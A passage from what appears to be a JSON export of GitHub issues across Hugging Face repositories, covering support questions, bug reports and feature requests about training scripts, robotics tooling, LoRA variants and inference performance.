rsync algorithm / protocol downloading to complete the retrieval of the somefile in the current directory regardless of other context.\n\n\n\nAlso I wonder if it'd be interesting to have a rsync to xet 'bridge' so anyone could use a normal rsync client but pull xet files from HF repos if HF doesn't want to support rsync itself in whole but has the conceptually aligned XET back end that could be \"mapped\" to rsync chunk based protocol (I suppose) by a thin protocol adapter?\n\nLots of e.g. linux distribution mirror sites support rsync as an HTTP/HTTPS alternative so it presumably has some significant market-share for people doing IT / devops / mlops / whatever use case downloads.\n",
    "url": "https://github.com/huggingface/xet-core/issues/321",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T22:16:02Z",
    "updated_at": "2025-05-16T17:48:45Z",
    "user": "ghchris2021"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1819,
    "title": "Correct syntax of .env: what are those backticks for multiline strings?",
    "body": "I have read the suggestion of checking discussions but I was unable to find an answer so something very basic looks like it is missing here.\n\nIn the documentation there are many examples suggesting of putting long values in env var surrounded by backticks.\n\nHowever when I do this I get errors like:\n\nJSON5: invalid character '`' at 1:1\n\nI have checked around and I have been unable to find anywhere references to .env using backticks for multiline strings, and the parser is refusing this.\n\nTHis is happening with a git clone of main but also using tagged versions.\n\nSo how do you possibile use this apparently non standard syntax and how is it possible no one else but me is having this issue? \n\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1819",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-05-13T12:21:43Z",
    "updated_at": "2025-05-23T09:37:09Z",
    "comments": 1,
    "user": "sciabarracom"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2262,
    "title": "New Release to Support `transformers>=4.51.0`?",
    "body": "### Feature request\n\nThe latest release (`1.24.0`) is 4 months old. There has been around 38 commits since the last release. Will there be a new release soon?\n\n### Motivation\n\nThere is a medium CVE related to `transformers==4.48.1` that is the latest compatible version.\nGHSA-fpwr-67px-3qhx\n\nI am also blocked from upgrading `vllm==0.8.5` within my system as it requires `transformers>=4.51.0`. `transformers==4.48.1` is compatible with up to `vllm==0.8.2` only where there are critical and high CVEs.\nGHSA-hj4w-hm2g-p6w5\nGHSA-9f8f-2vmf-885j\n\nIt looks like the current dependencies in the `main` branch will mitigate these issues completely. Is there any blocker to creating a new release from current state?\n\n### Your contribution\n\nDon't think I will be granted permissions to create releases in this project.",
    "url": "https://github.com/huggingface/optimum/issues/2262",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T07:46:15Z",
    "updated_at": "2025-05-13T22:27:08Z",
    "comments": 2,
    "user": "yxtay"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1101,
    "title": "ValueError: No integer found between bounds [low_factor=np.float32(-0.001953125), upp_factor=np.float32(-0.001953125)]",
    "body": "### System Info\n\n```Shell\n2025,ubantu,python3.10. when doing teleoperation\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\npython lerobot/scripts/control_robot.py   --robot.type=so100   --robot.cameras='{}'   --control.type=teleoperate \n\n\n### Expected behavior\n\nHow to deal with it.",
    "url": "https://github.com/huggingface/lerobot/issues/1101",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-13T05:06:35Z",
    "updated_at": "2025-06-19T14:25:08Z",
    "user": "qingx-cyber"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11542,
    "title": "What's the difference between 'example/train_text_to_image_lora.py' and 'example/research_projects/lora/train_text_to_image_lora.py' ?",
    "body": " I want to use the \"--train_text_encoder\" argument, but it only exists in the latter script.",
    "url": "https://github.com/huggingface/diffusers/issues/11542",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-13T01:41:19Z",
    "updated_at": "2025-06-10T20:35:10Z",
    "comments": 2,
    "user": "night-train-zhx"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1097,
    "title": "UnboundLocalError: local variable 'action' referenced before assignment",
    "body": "May I ask where the problem lies? It occurred during the evaluation of the strategy and I have been searching for a long time without finding a solution\n\n(lerobot) wzx@wzx:~/lerobot$ python lerobot/scripts/control_robot.py   \\\n> --robot.type=so101   \\\n> --control.type=record   \\\n> --control.fps=30   \\\n> --control.single_task=\"Grasp a lego block and put it in the bin.\" \\\n> --control.repo_id=${HF_USER}/eval_act_so101_test   \\\n> --control.tags='[\"tutorial\"]'   \\\n> --control.warmup_time_s=5   \\\n> --control.episode_time_s=30   \\\n> --control.reset_time_s=30   \\\n> --control.num_episodes=10  \\\n> --control.display_data=true \\\n> --control.push_to_hub=true   \\\n> --control.policy.path=outputs/train/act_so101_test/checkpoints/last/pretrained_model \nINFO 2025-05-12 22:54:05 ol_robot.py:408 {'control': {'display_data': True,\n             'episode_time_s': 30,\n             'fps': 30,\n             'num_episodes': 10,\n             'num_image_writer_processes': 0,\n             'num_image_writer_threads_per_camera': 4,\n             'play_sounds': True,\n             'policy': {'beta_end': 0.02,\n                        'beta_schedule': 'squaredcos_cap_v2',\n                        'beta_start': 0.0001,\n                        'clip_sample': True,\n                        'clip_sample_range': 1.0,\n                        'crop_is_random': True,\n                        'crop_shape': (84, 84),\n                        'device': 'cuda',\n                        'diffusion_step_embed_dim': 128,\n                        'do_mask_loss_for_padding': False,\n                        'down_dims': (512, 1024, 2048),\n                        'drop_n_last_frames': 7,\n                        'horizon': 16,\n                        'input_features': {'observation.images.laptop': {'shape': (3,\n                                                                                   480,\n                                                                                   640),\n                                                                         'type': },\n                                           'observation.images.phone': {'shape': (3,\n                                                                                  480,\n                                                                                  640),\n                                                                        'type': },\n                                           'observation.state': {'shape': (6,),\n                                                                 'type': }},\n                        'kernel_size': 5,\n                        'n_action_steps': 8,\n                        'n_groups': 8,\n                        'n_obs_steps': 2,\n                        'noise_scheduler_type': 'DDPM',\n                        'normalization_mapping': {'ACTION': ,\n                                                  'STATE': ,\n                                                  'VISUAL': },\n                        'num_inference_steps': None,\n                        'num_train_timesteps': 100,\n                        'optimizer_betas': (0.95, 0.999),\n                        'optimizer_eps': 1e-08,\n                        'optimizer_lr': 0.0001,\n                        'optimizer_weight_decay': 1e-06,\n                        'output_features': {'action': {'shape': (6,),\n                                                       'type': }},\n                        'prediction_type': 'epsilon',\n                        'pretrained_backbone_weights': None,\n                        'scheduler_name': 'cosine',\n                        'scheduler_warmup_steps': 500,\n                        'spatial_softmax_num_keypoints': 32,\n                        'use_amp': False,\n                        'use_film_scale_modulation': True,\n                        'use_group_norm': True,\n                        'use_separate_rgb_encoder_per_camera': False,\n                        'vision_backbone': 'resnet18'},\n             'private': False,\n             'push_to_hub': True,\n             'repo_id': 'bursomi/eval_act_so101_test',\n             'reset_time_s': 30,\n             'resume': False,\n             'root': None,\n             'single_task': 'Grasp a lego block and put it in the bin.',\n             'tags': ['tutorial'],\n             'video': True,\n             'warmup_time_s': 5},\n 'robot': {'calibration_dir': '.cache/calibration/so101',\n           'cameras': {'laptop': {'camera_index': 2,\n                                  'channels': 3,\n                                  'color_mode': 'rgb',\n                                  'fps': 30,\n                                  'height': 480,\n                                  'mock': False,\n                                  'rotation': None,\n                ",
    "url": "https://github.com/huggingface/lerobot/issues/1097",
    "state": "closed",
    "labels": [
      "bug",
      "question"
    ],
    "created_at": "2025-05-12T16:06:27Z",
    "updated_at": "2025-06-19T14:08:57Z",
    "user": "incomple42"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1093,
    "title": "List of available task",
    "body": "Thank you for your effort. Can you provide a list of available tasks (not just environments) for better understanding and usage? ",
    "url": "https://github.com/huggingface/lerobot/issues/1093",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-10T06:18:21Z",
    "updated_at": "2025-10-17T12:03:32Z",
    "user": "return-sleep"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38052,
    "title": "`.to` on a `PreTrainedModel` throws a Pyright type check error. What is the correct way to put a model to the device that does not throw type check errors?",
    "body": "### System Info\n\n(venv) nicholas@B367309:tmp(master)$ transformers-cli env\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.51.1\n- Platform: Linux-5.10.16.3-microsoft-standard-WSL2-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.30.2\n- Safetensors version: 0.5.3\n- Accelerate version: 1.6.0\n- Accelerate config:    not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu126 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA RTX 2000 Ada Generation Laptop GPU\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHere is a small snippet\n\n```python\nfrom transformers.models.auto.modeling_auto import AutoModelForCausalLM\nfrom transformers.models.llama.modeling_llama import LlamaForCausalLM\n\nmodel = AutoModelForCausalLM.from_pretrained(\n    \"deepseek-ai/deepseek-coder-1.3b-instruct\", torch_dtype=torch.float16\n)\nassert isinstance(model, LlamaForCausalLM)\nmodel.to(\"cuda:0\")\n```\n\nThis code runs fine and correctly puts the model to the device, however, `Pyright` throws a pre-runtime type check error on the `model.to(\"cuda:0\") call. This is the error,\n\n```plaintext\nPyright: Argument of type \"Literal['cuda:0']\" cannot be assigned to parameter \"self\" of \ntype \"LlamaForCausalLM\" in function \"__call__\".\n\"Literal['cuda:0']\" is not assignable to \"LlamaForCausalLM\" [reportArgumentType]  \n```\n\nWhat is the correct way to put a model to the device that will satisfy the type checker?\n\n### Expected behavior\n\nThere should be know static type check error when doing `model.to()`",
    "url": "https://github.com/huggingface/transformers/issues/38052",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-09T19:01:15Z",
    "updated_at": "2025-06-29T08:03:07Z",
    "user": "nickeisenberg"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 401,
    "title": "how to train wan using multi-node",
    "body": "### Feature request  / \u529f\u80fd\u5efa\u8bae\n\nHi! I still wonder the multi-node training of Wan2.1 14B. Do you support FSDP across nodes? \n\n### Motivation / \u52a8\u673a\n\nCurrently the memory restraint is very harsh for long video LoRA fine-tuning\n\n### Your contribution / \u60a8\u7684\u8d21\u732e\n\nN/A",
    "url": "https://github.com/huggingface/finetrainers/issues/401",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-09T18:11:07Z",
    "updated_at": "2025-05-09T18:11:07Z",
    "user": "Radioheading"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1091,
    "title": "Diffusion policy for different tasks instead of PushT",
    "body": "Thank you all for the great job. I want to know if I can train the diffusion policy for different tasks besides the PushT task. How to achieve that? If the task is a new custom task with custom dataset, is there any feasible solution to solve that? \nThank you for your help!",
    "url": "https://github.com/huggingface/lerobot/issues/1091",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-05-09T15:44:20Z",
    "updated_at": "2025-12-31T02:35:27Z",
    "user": "siqisiqisiqisiqi"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1086,
    "title": "push_to_the_hub error",
    "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: macOS-14.6.1-arm64-arm-64bit\n- Python version: 3.10.13\n- Huggingface_hub version: 0.30.2\n- Dataset version: 3.5.0\n- Numpy version: 2.2.5\n- PyTorch version (GPU?): 2.7.0 (False)\n- Cuda version: N/A\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nimport argparse\nfrom lerobot.common.datasets.lerobot_dataset import LeRobotDataset\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description=\"Push a local HuggingFace dataset to the Hub\")\n    parser.add_argument(\n        \"--path\", \n        type=str, \n        required=True, \n        help=\"Local directory containing the dataset\"\n    )\n    parser.add_argument(\n        \"--repo_id\", \n        type=str, \n        required=True, \n        help=\"Repository ID on HuggingFace Hub (format: username/dataset_name)\"\n    )\n    parser.add_argument(\n        \"--private\", \n        action=\"store_true\", \n        help=\"Whether to make the dataset private\"\n    )\n    # Removed unused arguments\n    return parser.parse_args()\n\ndef main():\n    args = parse_args()\n    \n    print(f\"Loading dataset from {args.path}...\")\n    dataset = LeRobotDataset(\n        repo_id=args.repo_id,\n        root=args.path\n    )\n    \n    print(f\"Pushing dataset to {args.repo_id}...\")\n    dataset.push_to_hub(\n        args.repo_id,\n        private=args.private\n    )\n    print(\"Dataset successfully pushed to Hub!\")\n    \n    return 0\n\nif __name__ == \"__main__\":\n    main()\n\n\n\"Image\"\n\n### Expected behavior\n\nupload it to the huggingface",
    "url": "https://github.com/huggingface/lerobot/issues/1086",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-09T03:48:09Z",
    "updated_at": "2025-10-17T11:55:25Z",
    "user": "jungwonshin"
  },
  {
    "repo": "huggingface/trl",
    "number": 3424,
    "title": "[GRPO] How to train model using vLLM and model parallelism on one node?",
    "body": "I tried to start GRPO trainer with vLLM and model parallelism on a single node with 8 GPUs (8 x A100 80G).\n\nMy plan was to use one GPU as the vLLM server and other 7 GPUs to load model with model parallelism (e.g., `device_map=\"auto\"`)\n\n```\nCUDA_VISIBLE_DEVICES=0 trl vllm-serve --model  &\nCUDA_VISIBLE_DEVICES=1,2,3,4,5,6,7 accelerate launch --num_machines 1 --num_processes 1 train.py\n```\n\nBut the training ran into the following error\n\n`AssertionError: this nccl communicator is created to work on cuda:0, but the input tensor is on cuda:1`\n\nI think it happened when copying the weights to vLLM server.\n\n```\ntorch==2.6.0+cu124\ntransformers==4.51.3\ntrl==0.17.0\naccelerate==1.4.0\n```\n\n",
    "url": "https://github.com/huggingface/trl/issues/3424",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-08T17:22:19Z",
    "updated_at": "2025-12-02T22:48:13Z",
    "user": "zhiqihuang"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1082,
    "title": "When add openvla oft  policy?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1082",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-05-08T09:16:16Z",
    "updated_at": "2025-12-31T02:35:30Z",
    "user": "zmf2022"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3213,
    "title": "Whether it supports Huawei Atlas300 graphics card?",
    "body": "### System Info\n\n\nDoes the tgi inference framework support Huawei Atlas300I graphics cards?Could you help come up with a compatible solution?\n\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n.\n\n### Expected behavior\n\nCompatible with Huawei graphics cards. I want to use tgi on the Huawei Atlas300I graphics card",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3213",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-08T03:18:30Z",
    "updated_at": "2025-05-08T03:18:38Z",
    "comments": 0,
    "user": "fxb392"
  },
  {
    "repo": "huggingface/trl",
    "number": 3419,
    "title": "[GRPO] How to do gradient accumulation over sampled outputs?",
    "body": "Greetings,\n\nI am wondering if we have this feature to do gradient accumulation over sampled outputs. For example, if I have `num_generations = 4`, so we have a single query `q1`, we have`completions = [o1, o2, o3, o4]`. I want to set that `per_device_train_batch_size=2, gradient_accumulation_steps=2`. So that the GPU or cluster will sample `[o1, o2]` first, and then calculate the gradient, then do, `[o3,o4]`, and do gradient accumulation over these two mini-samples for the datapoint `q1`. \n\nI assume this will be equivalent to having `num_generations=4, per_device_train_batch_size=4, gradient_accumulation_steps=1`. But we cannot do this now. Could someone tell me how to properly do that? Do we support such feature now?\n\nI hope I made myself clear.\n\nThank you very much!",
    "url": "https://github.com/huggingface/trl/issues/3419",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-07T17:49:36Z",
    "updated_at": "2025-05-09T06:26:29Z",
    "user": "SpaceHunterInf"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1080,
    "title": "Update `control_sim_robot.py` to use the new configs",
    "body": "Adding this issue to track one of the TODO's of this MR #550 \n\nAs of now, [this script](https://github.com/huggingface/lerobot/blob/8cfab3882480bdde38e42d93a9752de5ed42cae2/lerobot/scripts/control_sim_robot.py) is outdated; It does not use the new configuration classes.",
    "url": "https://github.com/huggingface/lerobot/issues/1080",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-07T11:37:47Z",
    "updated_at": "2025-06-19T14:04:11Z",
    "user": "jccalvojackson"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 53,
    "title": "How to turn off error print?",
    "body": "When using multiprocessing, there is a lot of error message printed.",
    "url": "https://github.com/huggingface/Math-Verify/issues/53",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-07T08:19:36Z",
    "updated_at": "2025-07-02T16:07:02Z",
    "user": "wenxueru"
  },
  {
    "repo": "huggingface/peft",
    "number": 2533,
    "title": "Integrate TLoRA (Tri-Matrix LoRA)",
    "body": "### Feature request\n\nWe would like to propose integrating a novel parameter-efficient fine-tuning method called **TLoRA (Tri-Matrix LoRA)** into the `peft` library. We believe TLoRA offers significant advantages in terms of parameter efficiency, making it a valuable addition to the PEFT ecosystem.\n\nOur method is detailed in the paper: **https://arxiv.org/abs/2504.18735**\n\n**What is TLoRA?**\n\nTLoRA is a variation of LoRA that introduces a tri-matrix decomposition for the weight update matrix $\\Delta W$. Instead of the standard $W + A B$, TLoRA uses $W + \\alpha A B C $, where:\n\n* $W$ is the original pre-trained weight matrix.\n* $A$ is a fixed, non-trainable matrix (e.g., initialized randomly or using Kaiming/Xavier).\n* $B$ is the _only_ trainable matrix.\n* $C$ is another fixed, non-trainable matrix (similar initialization as A).\n* $\\alpha$ is a trainable scaling parameter.\n\nThe $\\Delta W$ update is computed as the product of three matrices: a fixed input projection matrix $A$, a small trainable bottleneck matrix $B$, and a fixed output projection matrix $C$. Only matrix $B$ is updated during fine-tuning.\n\n**TLoRA Implementation:**\n\nThe core idea can be represented in a layer similar to this (based on our implementation):\n\n```python\nclass TLoRALayer(nn.Module):\n    def __init__(self, weight, bias, rank=32):\n        super(TLoRALayer, self).__init__()\n\n        row, column = weight.shape\n\n        # Restore Linear layer\n        if bias is None:\n            self.linear = nn.Linear(column, row, bias=False)\n            self.linear.load_state_dict({\"weight\": weight})\n        else:\n            self.linear = nn.Linear(column, row)\n            self.linear.load_state_dict({\"weight\": weight, \"bias\": bias})\n\n        # Create TLoRA weights with initialization\n        self.random_A = nn.Parameter(\n            torch.zeros(column, rank), requires_grad=False\n        )  # First matrix, non-trainable\n        nn.init.kaiming_normal_(self.random_A, a=math.sqrt(5))\n\n        self.lora_B = nn.Parameter(torch.zeros(rank, rank))  # Second matrix (trainable)\n\n        self.random_C = nn.Parameter(\n            torch.zeros(rank, row), requires_grad=False\n        )  # Third matrix\n        nn.init.kaiming_normal_(self.random_C, a=math.sqrt(5))\n\n        self.lora_scaling = nn.Parameter(torch.ones(1))\n        self.dropout = nn.Dropout(0.5)\n\n    def forward(self, input):\n        # Standard linear transformation\n        x = self.linear(input)\n\n        # Low-rank adaptation with tri-matrix TLoRA\n        # Using the scaling to control the LoRA output\n        y = self.lora_scaling * (input @ self.random_A @ self.lora_B @ self.random_C)\n\n        y = self.dropout(y)\n\n        return x + y\n\n```\n\nFull Repo: https://github.com/itanvir/tlora \n\n### Motivation\n\n1.  **Extreme Parameter Efficiency:** The core trainable component in TLoRA is the matrix $B$ with dimensions `rank x rank`. Compared to standard LoRA's trainable matrices $A$ (`input_dim x rank`) and $B$ (`rank x output_dim`), TLoRA's trainable parameters are significantly fewer. This makes TLoRA potentially one of the most parameter-efficient methods in PEFT for a given rank.\n2.  **Competitive Performance:** The fixed matrices $A$ and $C$ can be seen as defining fixed subspaces. By training only the matrix $B$ connecting these subspaces, TLoRA might capture more focused and effective updates compared to training the full $A$ and $B$ matrices in standard LoRA. Our paper provides empirical evidence supporting its effectiveness.\n\n### Your contribution\n\nCan give inputs on the design. It should be straightforward.",
    "url": "https://github.com/huggingface/peft/issues/2533",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-06T21:22:50Z",
    "updated_at": "2025-06-15T15:03:57Z",
    "comments": 2,
    "user": "itanvir"
  },
  {
    "repo": "huggingface/candle",
    "number": 2945,
    "title": "Operating steps from scratch for beginners?",
    "body": "from\na\nTo\nZ",
    "url": "https://github.com/huggingface/candle/issues/2945",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-06T15:34:02Z",
    "updated_at": "2025-05-06T15:34:02Z",
    "comments": 0,
    "user": "Qarqor5555555"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1072,
    "title": "How to merge collected data into one?",
    "body": "For stability I collect data 10 episode by 10. Then forming this:\nrepo_id/first,repo_id_second...\nI want to merge them together to repo_id/one_task for training, but it's hard to fix meta files. \n\nI'm not sure if this approach helps with training, or if I should determine the number of episodes needed for training in advance when collecting data.",
    "url": "https://github.com/huggingface/lerobot/issues/1072",
    "state": "closed",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-05-06T02:27:24Z",
    "updated_at": "2025-05-07T02:29:27Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11499,
    "title": "[Performance] Issue on *SanaLinearAttnProcessor2_0 family. 1.06X speedup can be reached with a simple change.",
    "body": "### Sys env:\nOS Ubuntu 22.04\nPyTorch  2.4.0+cu121\nsana ==  0.0.1\nDiffusers == 0.34.0.dev0\n\n### Reproduce:\nTry the demo test code:\n```\nimport torch\nfrom diffusers import SanaPAGPipeline\n\npipe = SanaPAGPipeline.from_pretrained(\n  # \"Efficient-Large-Model/Sana_1600M_512px_diffusers\",  \n  \"Efficient-Large-Model/SANA1.5_1.6B_1024px_diffusers\",\n  torch_dtype=torch.bfloat16,\n  pag_applied_layers=\"transformer_blocks.8\",\n)\npipe.to(\"cuda\")\n\npipe.text_encoder.to(torch.bfloat16)\npipe.vae.to(torch.bfloat16)\n\nprompt = 'a cyberpunk cat with a neon sign that says \"Sana\"'\nimage = pipe(\n    prompt=prompt,\n    guidance_scale=5.0,\n    pag_scale=2.0,\n    num_inference_steps=20,\n    generator=torch.Generator(device=\"cuda\").manual_seed(42),\n)[0]\nimage[0].save('sana.png')\n```\n\nInference data will go through [SanaLinearAttnProcessor2_0](https://github.com/huggingface/diffusers/blob/58431f102cf39c3c8a569f32d71b2ea8caa461e1/src/diffusers/models/attention_processor.py#L6007)\n\n\n### Issue Description:\nLines 6042 and 6043 first transposed a contiguous tensor and then did type casting. Type casting invokes a data copy from an old type tensor to a new one. But if you print the new tensor's stride(), you will see:\n```\n        hidden_states = hidden_states.flatten(1, 2).transpose(1, 2)\n        hidden_states = hidden_states.to(original_dtype)\n        print(\"Contiguity after type casting: \", hidden_states.is_contiguous()) # False\n\n        hidden_states = attn.to_out[0](hidden_states)\n        hidden_states = attn.to_out[1](hidden_states)\n```\n\nThe problem is typecasting copies, only did the dtype transmission based on the input tensor's strides. And the bad-strided tensor is immediately used by the latter two functions. Inefficiency is broadcast.\n\n### How to Fix:\nlet `hidden_states.to(original_dtype)` do contiguous and typecasting simultaneously.\nOne possible approach:\n```\n@torch.compile\ndef transpose_cast_kernel(input_tensor: torch.Tensor) -> torch.Tensor:\n    \"\"\"\n    torch-compiled kernel that transposes a 2D tensor and converts it to bfloat16\n    \"\"\"\n    converted = input_tensor.to(torch.bfloat16)\n    transposed = torch.transpose(converted, 1, 2).contiguous()\n    return transposed\n```\nUse the versatile operation to handle the creation of the new tensor.\n```\n        hidden_states = hidden_states.flatten(1, 2).transpose(1, 2)\n        hidden_states = transpose_cast_kernel(hidden_states)\n        # hidden_states.is_contiguous() True\n\n        hidden_states = attn.to_out[0](hidden_states)\n        hidden_states = attn.to_out[1](hidden_states)\n```\nOr, your expert team could do even better.\n\n### Measurement:\nBy adopting the previous change, the **SanaLinearAttnProcessor2_0.__call__ enjoys** 1.06X speedup on RTX3090.\nPAGCFGSanaLinearAttnProcessor2_0, and PAGIdentitySanaLinearAttnProcessor2_0 have similar logic and lose performance as well. \n\n",
    "url": "https://github.com/huggingface/diffusers/issues/11499",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-05T21:26:51Z",
    "updated_at": "2025-08-08T23:44:59Z",
    "comments": 11,
    "user": "David-Dingle"
  },
  {
    "repo": "huggingface/candle",
    "number": 2944,
    "title": "finetuning yolo 8 candle model",
    "body": "What is the correct way to finetune yolo8 model to be used here ? Finetuning model using candle is not straightforward.\ncandle\\candle-examples\\examples\\yolo-v8\\main.rs \n// model model architecture points at ultralytics : https://github.com/ultralytics/ultralytics/issues/189\nBut my model trained using ultralytics and converted to safetensors yield tensor errors when used in candle ylo 8 example. Renaming the tensors to match the candle yolo model did not work.\n\nI see DarkNet struct in the model.rs so I wonder if one should rather use [Darknet](https://github.com/hank-ai/darknet) instead (@LaurentMazare ) ? \n",
    "url": "https://github.com/huggingface/candle/issues/2944",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-05T15:21:48Z",
    "updated_at": "2025-05-05T18:46:52Z",
    "comments": 0,
    "user": "flutter-painter"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11489,
    "title": "Error when I'm trying to train a Flux lora with train_dreambooth_lora_flux_advanced",
    "body": "### Describe the bug\n\nHi! I'm trying to train my lora model with [train_dreambooth_lora_flux_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_flux_advanced.py) script.\n\nWhen I'm trying to train my model with prior preservation tag I give an error.\n\nHow can I fix it?\n\n\n\n### Reproduction\n\n```bash\naccelerate launch train_dreambooth_lora_flux_advanced.py \\\n  --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n  --dataset_name=\"./ds5\" \\\n  --instance_prompt=\"1boy, 1girl\" \\\n  --validation_prompt=\"1boy, 1girl\" \\\n  --class_prompt=\"1boy, 1girl\" \\\n  --num_class_images=200 \\\n  --with_prior_preservation \\\n  --class_data_dir=\"./cdi\" \\\n  --output_dir=\"crtr-SDXL-LoRA\" \\\n  --caption_column=\"text\" \\\n  --mixed_precision=\"bf16\" \\\n  --prior_generation_precision=\"bf16\" \\\n  --resolution=1024 \\\n  --train_batch_size=8 \\\n  --repeats=1 \\\n  --gradient_accumulation_steps=8 \\\n  --gradient_checkpointing \\\n  --learning_rate=1.0 \\\n  --optimizer=\"prodigy\"\\\n  --lr_scheduler=\"constant\" \\\n  --lr_warmup_steps=0 \\\n  --rank=64 \\\n  --num_train_epochs=200 \\\n  --validation_epochs=100 \\\n  --center_crop \\\n  --adam_beta2=0.99 \\\n  --adam_weight_decay=0.01 \\\n  --allow_tf32\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\n  File \"/workspace/train_dreambooth_lora_flux_advanced.py\", line 2423, in \n    main(args)\n  File \"/workspace/train_dreambooth_lora_flux_advanced.py\", line 2213, in main\n    (weighting.float() * (model_pred_prior.float() - target_prior.float()) ** 2).reshape(\n     ~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nRuntimeError: The size of tensor a (16) must match the size of tensor b (8) at non-singleton dimension 0\n```\n\n### System Info\n\nDiffusers 0.33\nCUDA 12.9\nTorch 2.7\n\nDocker image\nnvcr.io/nvidia/pytorch:25.04-py3\n\n### Who can help?\n\n@sayakpaul",
    "url": "https://github.com/huggingface/diffusers/issues/11489",
    "state": "open",
    "labels": [
      "bug",
      "training"
    ],
    "created_at": "2025-05-04T21:19:23Z",
    "updated_at": "2025-07-06T19:38:40Z",
    "comments": 4,
    "user": "Mnwa"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11488,
    "title": "Sincerely Request The Support for Flux PAG Pipeline",
    "body": "When the pag pipeline of flux can be supported?",
    "url": "https://github.com/huggingface/diffusers/issues/11488",
    "state": "open",
    "labels": [
      "help wanted",
      "Good second issue"
    ],
    "created_at": "2025-05-04T11:12:05Z",
    "updated_at": "2025-05-16T04:53:52Z",
    "comments": 2,
    "user": "PlutoQyl"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3208,
    "title": "Can I use TGI in a Supercomputer?",
    "body": "I want to generate somewhere around 1 trillion tokens and I was thinking of using TGI on a European Supercomputer. is there a way to achieve this without relying on docker and downloading the model natively and then load it on the compute node and serve it? @Wauplin ",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3208",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-03T15:13:24Z",
    "updated_at": "2025-05-15T08:55:08Z",
    "comments": 4,
    "user": "sleepingcat4"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1305,
    "title": "Trying to convert dinov2 model",
